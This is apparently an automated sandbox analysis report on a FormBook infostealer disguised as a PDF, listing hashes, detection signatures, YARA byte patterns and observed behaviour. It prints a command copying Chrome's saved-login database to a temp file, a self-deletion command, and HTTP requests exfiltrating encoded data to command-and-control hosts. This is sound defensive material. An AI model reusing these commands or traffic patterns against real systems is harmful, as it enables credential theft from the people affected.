# Analysis Report #Uc5f0#Uc554_190304,pdf.exe

## Overview

### General Information

- Sample Name: #Uc5f0#Uc554_190304,pdf.exe
- MD5: 5f42c48fa893d3787fbab422292c76c3
- SHA1: d017e2ed84d8110bc6e1f8620715ede6da186cd9
- SHA256: c67708cd06644c1fda26e6c0e4cfaaddf15634e8288ae451824c3083155a5192

### Detection

FormBook
- Score: 100
- Range: 0 - 100
- Whitelisted: false
- Confidence: 100%

### Signatures

Benign windows process drops PE files
Detected FormBook malware
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: File Created with System Process Name
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality locales information (e.g. system language)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

### Classification

System is w10x64

- #Uc5f0#Uc554_190304,pdf.exe (PID: 5324; cmdline: 'C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe'; MD5: 5F42C48FA893D3787FBAB422292C76C3)
- #Uc5f0#Uc554_190304,pdf.exe (PID: 5160; cmdline: 'C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe'; MD5: 5F42C48FA893D3787FBAB422292C76C3)
- explorer.exe (PID: 2864; cmdline: (empty); MD5: E4A81EDDFF8B844D85C8B45354E4144E)
- chkdsk.exe (PID: 4804; cmdline: C:\Windows\SysWOW64\chkdsk.exe; MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
- cmd.exe (PID: 5328; cmdline: /c del 'C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe'; MD5: F3BDBE3BB6F734E357235F4D5898582D)
- conhost.exe (PID: 5696; cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1; MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 604; cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V; MD5: F3BDBE3BB6F734E357235F4D5898582D)
- conhost.exe (PID: 1880; cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1; MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- e2kdixix4hi0i2.exe (PID: 936; cmdline: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exe; MD5: 5F42C48FA893D3787FBAB422292C76C3)
- e2kdixix4hi0i2.exe (PID: 4988; cmdline: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exe; MD5: 5F42C48FA893D3787FBAB422292C76C3)
- NETSTAT.EXE (PID: 1512; cmdline: C:\Windows\SysWOW64\NETSTAT.EXE; MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)

## Malware Configuration

No configs have been found

## Yara Overview

### Memory Dumps

- Source: 00000012.00000002.1571990365.0000000000590000.00000040.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
- Source: 00000012.00000002.1571990365.0000000000590000.00000040.00000001.sdmp; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
  - 0x18449:$sqlite3step: 68 34 1C 7B E1
  - 0x1855c:$sqlite3step: 68 34 1C 7B E1
  - 0x18478:$sqlite3text: 68 38 2A 90 C5
  - 0x1859d:$sqlite3text: 68 38 2A 90 C5
  - 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
  - 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
- Source: 00000012.00000002.1571990365.0000000000590000.00000040.00000001.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
  - 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  - 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  - 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  - 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  - 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  - 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  - 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  - 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  - 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  - 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
  - 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
- Source: 00000002.00000002.1214499431.0000000000400000.00000040.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
- Source: 00000002.00000002.1214499431.0000000000400000.00000040.00000001.sdmp; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
  - 0x18449:$sqlite3step: 68 34 1C 7B E1
  - 0x1855c:$sqlite3step: 68 34 1C 7B E1
  - 0x18478:$sqlite3text: 68 38 2A 90 C5
  - 0x1859d:$sqlite3text: 68 38 2A 90 C5
  - 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
  - 0x185b3:$sqlite3blob: 68 53 D8 7F 8C

### Unpacked PEs

- Source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
- Source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpack; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
  - 0x17649:$sqlite3step: 68 34 1C 7B E1
  - 0x1775c:$sqlite3step: 68 34 1C 7B E1
  - 0x17678:$sqlite3text: 68 38 2A 90 C5
  - 0x1779d:$sqlite3text: 68 38 2A 90 C5
  - 0x1768b:$sqlite3blob: 68 53 D8 7F 8C
  - 0x177b3:$sqlite3blob: 68 53 D8 7F 8C
- Source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
  - 0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  - 0x8d32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  - 0x149c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  - 0x144b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  - 0x14ac7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  - 0x14c3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  - 0x98ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  - 0x1372c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  - 0xa5b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  - 0x19d37:$sequence_8: 3C 54 74 04 3C 74 75 F4
  - 0x1ad3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
- Source: 18.2.e2kdixix4hi0i2.exe.400000.0.raw.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
- Source: 18.2.e2kdixix4hi0i2.exe.400000.0.raw.unpack; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
  - 0x18449:$sqlite3step: 68 34 1C 7B E1
  - 0x1855c:$sqlite3step: 68 34 1C 7B E1
  - 0x18478:$sqlite3text: 68 38 2A 90 C5
  - 0x1859d:$sqlite3text: 68 38 2A 90 C5
  - 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
  - 0x185b3:$sqlite3blob: 68 53 D8 7F 8C

## Sigma Overview

### System Summary:

- Source: Process started; Author: Joe Security; Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: (empty), Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\chkdsk.exe, ParentImage: C:\Windows\SysWOW64\chkdsk.exe, ParentProcessId: 4804, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 604
- Sigma detected: File Created with System Process Name
  - Source: File created; Author: Sander Wiebing; Data: EventID: 11, Image: C:\Windows\explorer.exe, ProcessId: 2864, TargetFilename: C:\Users\user\AppData\Local\Temp\Lp4ml

## Signature Overview

### AV Detection:

- Multi AV Scanner detection for dropped file
  - Source: C:\Users\user\AppData\Local\Temp\Lp4ml\e2kdixix4hi0i2.exe; Virustotal: Detection: 30%
- Multi AV Scanner detection for submitted file
  - Source: #Uc5f0#Uc554_190304,pdf.exe; Virustotal: Detection: 30%
- Yara detected FormBook
  - Source: Yara match, type: MEMORY; File sources: 00000012.00000002.1571990365.0000000000590000.00000040.00000001.sdmp, 00000002.00000002.1214499431.0000000000400000.00000040.00000001.sdmp, 00000012.00000002.1571894133.0000000000560000.00000040.00000001.sdmp, 00000004.00000002.1785909962.0000000000DA0000.00000040.00000001.sdmp, 00000002.00000001.1159543424.0000000000400000.00000040.00020000.sdmp, 00000011.00000002.1554719039.0000000002220000.00000004.00000001.sdmp, 00000000.00000002.1163325954.0000000002670000.00000040.00000001.sdmp, 00000012.00000002.1570728418.0000000000400000.00000040.00000001.sdmp, 00000012.00000001.1550805281.0000000000400000.00000040.00020000.sdmp, 00000011.00000002.1555290718.0000000002560000.00000040.00000001.sdmp, 00000013.00000002.1573390650.0000000000760000.00000040.00000001.sdmp, 00000004.00000002.1786073120.0000000000DD0000.00000040.00000001.sdmp, 00000002.00000002.1215143868.0000000000580000.00000040.00000001.sdmp, 00000000.00000002.1163186746.0000000002630000.00000004.00000001.sdmp, 00000002.00000002.1214592086.0000000000470000.00000040.00000001.sdmp, 00000004.00000002.1789896940.00000000054F0000.00000004.00000001.sdmp
  - Source: Yara match, type: UNPACKEDPE; File sources: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpack, 18.2.e2kdixix4hi0i2.exe.400000.0.raw.unpack, 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.unpack, 17.2.e2kdixix4hi0i2.exe.2220000.2.raw.unpack, 18.1.e2kdixix4hi0i2.exe.400000.0.raw.unpack, 18.2.e2kdixix4hi0i2.exe.400000.0.unpack, 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, 17.2.e2kdixix4hi0i2.exe.2220000.2.unpack, 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.raw.unpack, 17.2.e2kdixix4hi0i2.exe.2560000.3.raw.unpack, 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.raw.unpack, 17.2.e2kdixix4hi0i2.exe.2560000.3.unpack, 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.raw.unpack, 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.raw.unpack, 18.1.e2kdixix4hi0i2.exe.400000.0.unpack
- Machine Learning detection for dropped file
  - Source: C:\Users\user\AppData\Local\Temp\Lp4ml\e2kdixix4hi0i2.exe; Joe Sandbox ML: detected
- Machine Learning detection for sample
  - Source: #Uc5f0#Uc554_190304,pdf.exe; Joe Sandbox ML: detected
- Antivirus or Machine Learning detection for unpacked file
  - Avira: Label: TR/Crypt.ZPACK.Gen; Sources: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpack, 18.2.e2kdixix4hi0i2.exe.400000.0.unpack, 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.unpack, 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, 17.2.e2kdixix4hi0i2.exe.2220000.2.unpack, 17.2.e2kdixix4hi0i2.exe.2560000.3.unpack, 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, 18.1.e2kdixix4hi0i2.exe.400000.0.unpack

- Contains functionality to enumerate / list files inside a directory
  - Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe; Code function: 0_2_004083DC FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime
  - Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe; Code function: 0_2_00405088 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn

- Found inlined nop instructions (likely shell or obfuscated code)
  - Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe; Code function: 4x nop then push 004659A0h (0_2_0045E23C)
  - Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe; Code function: 4x nop then push 00000000h (0_2_0045E23C)
  - Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe; Code function: 4x nop then call 00406074h (0_2_004659F4)
  - Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe; Code function: 4x nop then push 00000000h (0_2_004659F4)

### Networking:

- Uses netstat to query active network connections and open ports
  - Source: unknown; Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
- HTTP GET or POST without a user agent
  - Source: global traffic; HTTP traffic detected: GET /6dk/?4hG=le9ZFLPtKd8NP4oRc571WO4/dkAOUpI85HqTFH+oaVijRcBtEnjxc5iWZQM7UUOD057V&S2=vzrtEjS8dTOt0 HTTP/1.1, Host: www.sweetandsunny.com, Connection: close, Data Raw: 00 00 00 00 00 00 00
  - Source: global traffic; HTTP traffic detected: GET /6dk/?4hG=pg/jUtKomc/L4vhxH/kMeK3wbZstWx/FEKb2uJAMbWIhCvL1z2faZ29JSnFivOU2cy63&S2=vzrtEjS8dTOt0 HTTP/1.1, Host: www.elizavetakalinina.com, Connection: close, Data Raw: 00 00 00 00 00 00 00
- Internet Provider seen in connection with other malware
  - Source: Joe Sandbox View; ASN Name: unknown unknown
  - Source: Joe Sandbox View; ASN Name: unknown unknown
- Uses a known web browser user agent for HTTP communication
  - Source: global traffic; HTTP traffic detected: POST /6dk/ HTTP/1.1, Host: www.elizavetakalinina.com, Connection: close, Content-Length: 409, Cache-Control: no-cache, Origin: http://www.elizavetakalinina.com, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko, Content-Type: application/x-www-form-urlencoded, Accept: */*, Referer: http://www.elizavetakalinina.com/6dk/, Accept-Language: en-US, Accept-Encoding: gzip, deflate; Data Ascii: 4hG=hCzZKN(I6pm9tNkkRJJHPabTNbQeV1n5Y_KJ9p8yTGUdO7Ku6TefbzQ2Pk9phe46UR3nWU0LghGLZnzAE5gUDnGktsSHPAQNi1kjxmuZsuzunQSgNaDgbD39qMHrQQj-gKzV0kk10Paz96ybnL9zhbv25sfr4-VI8sq9KqeRBk5AAVrClhZBS_(_Hv2KJJKhRyYXePiQYrQQDJQkfZ07csU56DPyub1hMqtGG9NroSUWMm8R8zTNciyJkgXSmuG5O2weoUJ1nW5VYcks2T06f5ChIxPtxGKtj1fhbpD7OzEKr2jcicM9L8MWOdNLOpCSTIGKoozDoxU3uO1YjYHV435W~GYyM09zDTEvBhsdHUjMopjjYGtYcn87kUYTpTpP6GPiGym_wItMnEFAsQ).
  - Source: global traffic; HTTP traffic detected: POST /6dk/ HTTP/1.1, Host: www.elizavetakalinina.com, Connection: close, Content-Length: 158229, Cache-Control: no-cache, Origin: http://www.elizavetakalinina.com, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko, Content-Type: application/x-www-form-urlencoded, Accept: */*, Referer: http://www.elizavetakalinina.com/6dk/, Accept-Language: en-US, Accept-Encoding: gzip, deflate
  - Source: global traffic; HTTP traffic detected: the same two GET requests to www.sweetandsunny.com and www.elizavetakalinina.com listed under "HTTP GET or POST without a user agent"
- Performs DNS lookups
  - Source: unknown; DNS traffic detected: queries for: www.caishenhou.com
- Posts data to webserver
  - Source: unknown; HTTP traffic detected: the same POST /6dk/ request (Content-Length: 409) to www.elizavetakalinina.com listed under "Uses a known web browser user agent for HTTP communication"
  - Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found, Server: aruba-proxy, Date: Thu, 28 May 2020 03:55:44 GMT, Content-Type: text/html; charset=UTF-8, Transfer-Encoding: chunked, Connection: close, Vary: Accept-Encoding, Pragma: no-cache, Expires: Wed, 11 Jan 1984 05:00:00 GMT, Cache-Control: no-cache, must-revalidate, max-age=0, Link: ; rel="https://api.w.org/", Set-Cookie: PHPSESSID=376rpn6oase94253u3k1ot3ka7; path=/
- Urls found in memory or binary data
  - Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmp; Strings found in binary or memory: http://fontfabrik.com, http://www.apache.org/licenses/LICENSE-2.0, http://www.carterandcone.coml, http://www.fonts.com, http://www.founder.com.cn/cn, http://www.founder.com.cn/cn/bThe, http://www.founder.com.cn/cn/cThe, http://www.goodfont.co.kr, http://www.jiyu-kobo.co.jp/, http://www.sajatypeworks.com, http://www.sakkal.com, http://www.sandoll.co.kr, http://www.tiro.com, http://www.typography.netD, http://www.zhongyicts.com.cn
  - Source: explorer.exe, 00000003.00000000.1167784770.0000000003230000.00000004.00000001.sdmp; String found in binary or memory: http://ns.microsoftom/photo/1.2/tD
  - Source: explorer.exe, 00000003.00000002.1791418593.00000000030D0000.00000002.00000001.sdmp; String found in binary or memory: http://www.%s.comPA
  - Source: chkdsk.exe, 00000004.00000002.1792417186.0000000005E09000.00000004.00000001.sdmp; Strings found in binary or memory: http://www.elizavetakalinina.com, http://www.elizavetakalinina.com/6dk/
  - Source: chkdsk.exe, 00000004.00000002.1792598460.00000000060FF000.00000004.00000001.sdmp; String found in binary or memory: https://www.sweetandsunny.com/6dk/?4hG=le9ZFLPtKd8NP4oRc571WO4/dkAOUpI85HqTFH

- Contains functionality to read the clipboard data
  - Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe; Code function: 0_2_00420B44 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader
- Contains functionality to retrieve information about pressed keystrokes
  - Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe; Code function: 0_2_0043E138 GetKeyboardState

### E-Banking Fraud:

- Yara detected FormBook
  - Source: Yara match; the same memory dumps (type: MEMORY) and unpacked PEs (type: UNPACKEDPE) listed under "AV Detection" above

### System Summary:

